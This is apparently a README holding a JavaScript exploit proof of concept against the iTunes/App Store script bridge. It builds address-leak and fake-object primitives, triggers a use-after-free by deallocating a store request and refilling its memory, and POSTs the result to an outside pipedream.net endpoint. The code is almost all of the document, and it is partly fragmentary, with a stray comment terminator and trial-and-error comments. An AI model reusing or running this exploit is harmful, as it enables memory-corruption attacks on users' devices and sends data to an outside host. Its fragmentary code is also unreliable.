README.md
Rendering markdown...
// var i;
function addrof(obj) {
const saved = iTunes.scriptWindowContext();
iTunes.setScriptWindowContext_(obj);
try {
iTunes.window;
} catch(e) {
const match = /instance (0x[\da-f]+)$/i.exec(e);
if (match)
return match[1];
throw new Error('Unable to leak addr');
} finally {
iTunes.setScriptWindowContext_(saved);
}
}
function fakeobj(size, data, isa) {
var total_size = size + 4, isa_string = isa.toString();
// alloc an SUScriptXMLHTTPStoreRequest
const w = iTunes.makeXMLHTTPStoreRequest();
const req = iTunes.createFacebookRequest('http://', 'GET');
// malloc_size(SUScriptXMLHTTPStoreRequest) == total_size
const uri = str2DataUri(makeStr(total_size));
// avoid GC
window.w = w;
window.req = req;
// get a dangling pointer
w.dealloc();
for (i = 0; i < total_size + 4; i++) {
if (i >= size) {
req.addMultiPartData(uri, parseInt(isa_string[i - size] + isa_string[i - size + 1]), 'B');
i++;
}
else
req.addMultiPartData(uri, data[i], 'B');
}
// If this doesn't work, try w();, w, xhttp.send(w), return w, and/or w().
return w;
}

const a = [];
for (i = 0; i < 32; i++)
a[i] = 'A';
var xhttp = new XMLHttpRequest();
xhttp.open("POST", "https://5381de4c031642a344fea58b89f511ba.m.pipedream.net", true);
xhttp.send(fakeobj(192, a, 0x41414141));
*/
// alloc an SUScriptXMLHTTPStoreRequest
const w = iTunes.makeXMLHTTPStoreRequest();
const req = iTunes.createFacebookRequest('http://', 'GET'); // malloc_size(SUScriptXMLHTTPStoreRequest) == 192
const uri = str2DataUri(makeStr(192));
// avoid GC
window.w = w;
window.req = req;
w.dealloc(); // get a dangling pointer
for (let i = 0; i < 32; i++) // reclaim the memory
req.addMultiPartData(uri, 'A', 'B'); // only the first arg matters
var xhttp = new XMLHttpRequest();
xhttp.open("POST", "https://5381de4c031642a344fea58b89f511ba.m.pipedream.net", true);
xhttp.send(0);